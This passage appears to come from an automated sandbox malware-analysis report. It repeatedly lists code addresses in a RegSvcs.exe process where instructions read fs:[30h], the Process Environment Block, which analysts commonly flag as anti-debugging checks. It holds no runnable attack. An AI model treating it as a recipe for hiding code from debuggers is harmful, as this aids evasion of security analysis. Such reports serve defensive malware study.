                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014DA250 mov eax, dword ptr fs:[00000030h]14_2_014DA250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01424260 mov eax, dword ptr fs:[00000030h]14_2_01424260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01424260 mov eax, dword ptr fs:[00000030h]14_2_01424260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01424260 mov eax, dword ptr fs:[00000030h]14_2_01424260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141826B mov eax, dword ptr fs:[00000030h]14_2_0141826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D0274 mov eax, dword ptr fs:[00000030h]14_2_014D0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D0274 mov eax, dword ptr fs:[00000030h]14_2_014D0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D0274 mov eax, dword ptr fs:[00000030h]14_2_014D0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D0274 mov eax, dword ptr fs:[00000030h]14_2_014D0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D0274 mov eax, dword ptr fs:[00000030h]14_2_014D0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D0274 mov eax, dword ptr fs:[00000030h]14_2_014D0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D0274 mov eax, dword ptr fs:[00000030h]14_2_014D0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D0274 mov eax, dword ptr fs:[00000030h]14_2_014D0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D0274 mov eax, dword ptr fs:[00000030h]14_2_014D0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D0274 mov eax, dword ptr fs:[00000030h]14_2_014D0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D0274 mov eax, dword ptr fs:[00000030h]14_2_014D0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D0274 mov eax, dword ptr fs:[00000030h]14_2_014D0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141823B mov eax, dword ptr fs:[00000030h]14_2_0141823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142A2C3 mov eax, dword ptr fs:[00000030h]14_2_0142A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142A2C3 mov eax, dword ptr fs:[00000030h]14_2_0142A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142A2C3 mov eax, dword ptr fs:[00000030h]14_2_0142A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142A2C3 mov eax, dword ptr fs:[00000030h]14_2_0142A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142A2C3 mov eax, dword ptr fs:[00000030h]14_2_0142A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F62D6 mov eax, dword ptr fs:[00000030h]14_2_014F62D6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014302E1 mov eax, dword ptr fs:[00000030h]14_2_014302E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014302E1 mov eax, dword ptr fs:[00000030h]14_2_014302E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014302E1 mov eax, dword ptr fs:[00000030h]14_2_014302E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145E284 mov eax, dword ptr fs:[00000030h]14_2_0145E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145E284 mov eax, dword ptr fs:[00000030h]14_2_0145E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A0283 mov eax, dword ptr fs:[00000030h]14_2_014A0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A0283 mov eax, dword ptr fs:[00000030h]14_2_014A0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A0283 mov eax, dword ptr fs:[00000030h]14_2_014A0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014302A0 mov eax, dword ptr fs:[00000030h]14_2_014302A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014302A0 mov eax, dword ptr fs:[00000030h]14_2_014302A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B62A0 mov eax, dword ptr fs:[00000030h]14_2_014B62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B62A0 mov ecx, dword ptr fs:[00000030h]14_2_014B62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B62A0 mov eax, dword ptr fs:[00000030h]14_2_014B62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B62A0 mov eax, dword ptr fs:[00000030h]14_2_014B62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B62A0 mov eax, dword ptr fs:[00000030h]14_2_014B62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B62A0 mov eax, dword ptr fs:[00000030h]14_2_014B62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01428550 mov eax, dword ptr fs:[00000030h]14_2_01428550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01428550 mov eax, dword ptr fs:[00000030h]14_2_01428550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145656A mov eax, dword ptr fs:[00000030h]14_2_0145656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145656A mov eax, dword ptr fs:[00000030h]14_2_0145656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145656A mov eax, dword ptr fs:[00000030h]14_2_0145656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B6500 mov eax, dword ptr fs:[00000030h]14_2_014B6500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F4500 mov eax, dword ptr fs:[00000030h]14_2_014F4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F4500 mov eax, dword ptr fs:[00000030h]14_2_014F4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F4500 mov eax, dword ptr fs:[00000030h]14_2_014F4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F4500 mov eax, dword ptr fs:[00000030h]14_2_014F4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F4500 mov eax, dword ptr fs:[00000030h]14_2_014F4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F4500 mov eax, dword ptr fs:[00000030h]14_2_014F4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F4500 mov eax, dword ptr fs:[00000030h]14_2_014F4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430535 mov eax, dword ptr fs:[00000030h]14_2_01430535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430535 mov eax, dword ptr fs:[00000030h]14_2_01430535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430535 mov eax, dword ptr fs:[00000030h]14_2_01430535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430535 mov eax, dword ptr fs:[00000030h]14_2_01430535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430535 mov eax, dword ptr fs:[00000030h]14_2_01430535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430535 mov eax, dword ptr fs:[00000030h]14_2_01430535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144E53E mov eax, dword ptr fs:[00000030h]14_2_0144E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144E53E mov eax, dword ptr fs:[00000030h]14_2_0144E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144E53E mov eax, dword ptr fs:[00000030h]14_2_0144E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144E53E mov eax, dword ptr fs:[00000030h]14_2_0144E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144E53E mov eax, dword ptr fs:[00000030h]14_2_0144E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145E5CF mov eax, dword ptr fs:[00000030h]14_2_0145E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145E5CF mov eax, dword ptr fs:[00000030h]14_2_0145E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014265D0 mov eax, dword ptr fs:[00000030h]14_2_014265D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145A5D0 mov eax, dword ptr fs:[00000030h]14_2_0145A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145A5D0 mov eax, dword ptr fs:[00000030h]14_2_0145A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014225E0 mov eax, dword ptr fs:[00000030h]14_2_014225E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144E5E7 mov eax, dword ptr fs:[00000030h]14_2_0144E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144E5E7 mov eax, dword ptr fs:[00000030h]14_2_0144E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144E5E7 mov eax, dword ptr fs:[00000030h]14_2_0144E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144E5E7 mov eax, dword ptr fs:[00000030h]14_2_0144E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144E5E7 mov eax, dword ptr fs:[00000030h]14_2_0144E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144E5E7 mov eax, dword ptr fs:[00000030h]14_2_0144E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144E5E7 mov eax, dword ptr fs:[00000030h]14_2_0144E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144E5E7 mov eax, dword ptr fs:[00000030h]14_2_0144E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145C5ED mov eax, dword ptr fs:[00000030h]14_2_0145C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145C5ED mov eax, dword ptr fs:[00000030h]14_2_0145C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01422582 mov eax, dword ptr fs:[00000030h]14_2_01422582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01422582 mov ecx, dword ptr fs:[00000030h]14_2_01422582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01454588 mov eax, dword ptr fs:[00000030h]14_2_01454588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145E59C mov eax, dword ptr fs:[00000030h]14_2_0145E59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A05A7 mov eax, dword ptr fs:[00000030h]14_2_014A05A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A05A7 mov eax, dword ptr fs:[00000030h]14_2_014A05A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A05A7 mov eax, dword ptr fs:[00000030h]14_2_014A05A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014445B1 mov eax, dword ptr fs:[00000030h]14_2_014445B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014445B1 mov eax, dword ptr fs:[00000030h]14_2_014445B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145E443 mov eax, dword ptr fs:[00000030h]14_2_0145E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145E443 mov eax, dword ptr fs:[00000030h]14_2_0145E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145E443 mov eax, dword ptr fs:[00000030h]14_2_0145E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145E443 mov eax, dword ptr fs:[00000030h]14_2_0145E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145E443 mov eax, dword ptr fs:[00000030h]14_2_0145E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145E443 mov eax, dword ptr fs:[00000030h]14_2_0145E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145E443 mov eax, dword ptr fs:[00000030h]14_2_0145E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145E443 mov eax, dword ptr fs:[00000030h]14_2_0145E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014DA456 mov eax, dword ptr fs:[00000030h]14_2_014DA456
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141645D mov eax, dword ptr fs:[00000030h]14_2_0141645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144245A mov eax, dword ptr fs:[00000030h]14_2_0144245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014AC460 mov ecx, dword ptr fs:[00000030h]14_2_014AC460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144A470 mov eax, dword ptr fs:[00000030h]14_2_0144A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144A470 mov eax, dword ptr fs:[00000030h]14_2_0144A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144A470 mov eax, dword ptr fs:[00000030h]14_2_0144A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01458402 mov eax, dword ptr fs:[00000030h]14_2_01458402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01458402 mov eax, dword ptr fs:[00000030h]14_2_01458402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01458402 mov eax, dword ptr fs:[00000030h]14_2_01458402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141E420 mov eax, dword ptr fs:[00000030h]14_2_0141E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141E420 mov eax, dword ptr fs:[00000030h]14_2_0141E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141E420 mov eax, dword ptr fs:[00000030h]14_2_0141E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141C427 mov eax, dword ptr fs:[00000030h]14_2_0141C427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A6420 mov eax, dword ptr fs:[00000030h]14_2_014A6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A6420 mov eax, dword ptr fs:[00000030h]14_2_014A6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A6420 mov eax, dword ptr fs:[00000030h]14_2_014A6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A6420 mov eax, dword ptr fs:[00000030h]14_2_014A6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A6420 mov eax, dword ptr fs:[00000030h]14_2_014A6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A6420 mov eax, dword ptr fs:[00000030h]14_2_014A6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A6420 mov eax, dword ptr fs:[00000030h]14_2_014A6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145A430 mov eax, dword ptr fs:[00000030h]14_2_0145A430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014204E5 mov ecx, dword ptr fs:[00000030h]14_2_014204E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014DA49A mov eax, dword ptr fs:[00000030h]14_2_014DA49A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014264AB mov eax, dword ptr fs:[00000030h]14_2_014264AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014544B0 mov ecx, dword ptr fs:[00000030h]14_2_014544B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014AA4B0 mov eax, dword ptr fs:[00000030h]14_2_014AA4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145674D mov esi, dword ptr fs:[00000030h]14_2_0145674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145674D mov eax, dword ptr fs:[00000030h]14_2_0145674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145674D mov eax, dword ptr fs:[00000030h]14_2_0145674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01420750 mov eax, dword ptr fs:[00000030h]14_2_01420750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462750 mov eax, dword ptr fs:[00000030h]14_2_01462750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462750 mov eax, dword ptr fs:[00000030h]14_2_01462750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014AE75D mov eax, dword ptr fs:[00000030h]14_2_014AE75D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A4755 mov eax, dword ptr fs:[00000030h]14_2_014A4755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01428770 mov eax, dword ptr fs:[00000030h]14_2_01428770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430770 mov eax, dword ptr fs:[00000030h]14_2_01430770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430770 mov eax, dword ptr fs:[00000030h]14_2_01430770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430770 mov eax, dword ptr fs:[00000030h]14_2_01430770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430770 mov eax, dword ptr fs:[00000030h]14_2_01430770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430770 mov eax, dword ptr fs:[00000030h]14_2_01430770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430770 mov eax, dword ptr fs:[00000030h]14_2_01430770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430770 mov eax, dword ptr fs:[00000030h]14_2_01430770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430770 mov eax, dword ptr fs:[00000030h]14_2_01430770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430770 mov eax, dword ptr fs:[00000030h]14_2_01430770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430770 mov eax, dword ptr fs:[00000030h]14_2_01430770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430770 mov eax, dword ptr fs:[00000030h]14_2_01430770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430770 mov eax, dword ptr fs:[00000030h]14_2_01430770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145C700 mov eax, dword ptr fs:[00000030h]14_2_0145C700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01420710 mov eax, dword ptr fs:[00000030h]14_2_01420710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01450710 mov eax, dword ptr fs:[00000030h]14_2_01450710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145C720 mov eax, dword ptr fs:[00000030h]14_2_0145C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145C720 mov eax, dword ptr fs:[00000030h]14_2_0145C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145273C mov eax, dword ptr fs:[00000030h]14_2_0145273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145273C mov ecx, dword ptr fs:[00000030h]14_2_0145273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145273C mov eax, dword ptr fs:[00000030h]14_2_0145273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0149C730 mov eax, dword ptr fs:[00000030h]14_2_0149C730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142C7C0 mov eax, dword ptr fs:[00000030h]14_2_0142C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A07C3 mov eax, dword ptr fs:[00000030h]14_2_014A07C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014427ED mov eax, dword ptr fs:[00000030h]14_2_014427ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014427ED mov eax, dword ptr fs:[00000030h]14_2_014427ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014427ED mov eax, dword ptr fs:[00000030h]14_2_014427ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014AE7E1 mov eax, dword ptr fs:[00000030h]14_2_014AE7E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014247FB mov eax, dword ptr fs:[00000030h]14_2_014247FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014247FB mov eax, dword ptr fs:[00000030h]14_2_014247FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C678E mov eax, dword ptr fs:[00000030h]14_2_014C678E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014207AF mov eax, dword ptr fs:[00000030h]14_2_014207AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D47A0 mov eax, dword ptr fs:[00000030h]14_2_014D47A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0143C640 mov eax, dword ptr fs:[00000030h]14_2_0143C640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014E866E mov eax, dword ptr fs:[00000030h]14_2_014E866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014E866E mov eax, dword ptr fs:[00000030h]14_2_014E866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145A660 mov eax, dword ptr fs:[00000030h]14_2_0145A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145A660 mov eax, dword ptr fs:[00000030h]14_2_0145A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01452674 mov eax, dword ptr fs:[00000030h]14_2_01452674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0149E609 mov eax, dword ptr fs:[00000030h]14_2_0149E609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0143260B mov eax, dword ptr fs:[00000030h]14_2_0143260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0143260B mov eax, dword ptr fs:[00000030h]14_2_0143260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0143260B mov eax, dword ptr fs:[00000030h]14_2_0143260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0143260B mov eax, dword ptr fs:[00000030h]14_2_0143260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0143260B mov eax, dword ptr fs:[00000030h]14_2_0143260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0143260B mov eax, dword ptr fs:[00000030h]14_2_0143260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0143260B mov eax, dword ptr fs:[00000030h]14_2_0143260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462619 mov eax, dword ptr fs:[00000030h]14_2_01462619
